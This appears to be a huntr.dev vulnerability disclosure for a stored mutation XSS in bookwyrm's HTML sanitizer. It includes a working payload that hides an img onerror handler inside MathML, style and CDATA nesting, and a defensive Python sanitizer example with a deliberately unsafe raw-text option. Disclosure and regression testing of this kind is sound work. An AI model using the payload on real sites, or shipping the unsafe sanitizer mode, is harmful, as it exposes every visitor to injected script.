History: Jul 04, 2022 - 7:11 p.m.

Mutation Stored XSS at homepage

2022-07-04 19:11:19
vovikhangcdv
www.huntr.dev
36
xss
html input sanitizer
mutation
homepage
dompurify
weakness
htmlparser

EPSS

0.001

Percentile

26.2%

Description

The bookwyrm HTML input sanitizer is vulnerable to mutation XSS. The payload can be stored and is rendered on the homepage of the website (paths /#feed and /#discovery), so it affects all users and the main site.

Proof of Concept

Edit a book description:

// PoC
<math><mtext><table><mglyph><style><![CDATA ><img src></style><img title="]]></mglyph><img&Tab;src=1&Tab;onerror=alert('Pwned')>">

Visiting /#feed (the homepage of a logged-in user) or /#discovery (which displays the book with the payload) triggers the injected script and pops up a "Pwned" alert.

Video PoC (link): Mutation XSS

Suggestion

The vulnerability stems from a weakness of HTMLParser: it is not guaranteed to parse every kind of string input the same way a browser does. You could replace it with another sanitizer, such as DOMPurify, to achieve more accuracy while still supporting HTML.
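A defender's regression check for the parser mismatch described above, as an added example that is not bookwyrm's code: a minimal html.parser-based allowlist sanitizer, a deliberately weak variant (escape_text=False) that re-emits decoded text raw, and a fixed-point check that flags any output the sanitizer itself would change on a second pass. ALLOWED, sanitize and is_fixed_point are constructed names; the payload string is the one from the report, the other inputs are constructed.

```python
from html import escape
from html.parser import HTMLParser

# Constructed allowlist: tag -> attributes that are kept for it.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(), "a": {"href"}}

class AllowlistSanitizer(HTMLParser):
    """Minimal allowlist sanitizer on html.parser (constructed, not bookwyrm's code).

    escape_text=False reproduces a classic weakness: decoded text is written back
    raw, so "&lt;img ...&gt;" in the input becomes a live <img> tag in the output.
    """
    def __init__(self, escape_text=True):
        super().__init__(convert_charrefs=True)
        self.escape_text, self.out, self.dropped = escape_text, [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append(("tag", tag))      # worth logging: stripped markup
            return
        kept = [(k, v) for k, v in attrs
                if k in ALLOWED[tag] and v and v.startswith(("https://", "http://"))]
        attr_text = "".join(f' {k}="{escape(v)}"' for k, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Hardened path re-escapes text so '<' can never re-emerge as markup.
        self.out.append(escape(data, quote=False) if self.escape_text else data)

    # Comments, <!DOCTYPE>, <![CDATA[ ... and <?...?> never reach the output.
    def handle_comment(self, data): self.dropped.append(("comment", data))
    def handle_decl(self, decl): self.dropped.append(("decl", decl))
    def unknown_decl(self, data): self.dropped.append(("decl", data))
    def handle_pi(self, data): self.dropped.append(("pi", data))

def sanitize(html, escape_text=True):
    p = AllowlistSanitizer(escape_text)
    p.feed(html)
    p.close()
    return "".join(p.out)

def is_fixed_point(html, escape_text=True):
    """mXSS regression check: sanitizing the output a second time must change nothing."""
    once = sanitize(html, escape_text)
    return sanitize(once, escape_text) == once

# Inputs: the report's payload (with &Tab; kept as written) and a constructed entity-wrapped tag.
PAYLOAD = ('<math><mtext><table><mglyph><style><![CDATA ><img src></style>'
           '<img title="]]></mglyph><img&Tab;src=1&Tab;onerror=alert(\'Pwned\')>">')
ENTITY_WRAPPED = "&lt;img src=x onerror=alert(1)&gt;"
```

The fixed-point check only catches mutations this same parser can see; the report's MathML/mglyph trick depends on how the browser reparses the stored markup, which only a sanitizer running on a browser-grade DOM (the DOMPurify suggestion) can account for.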
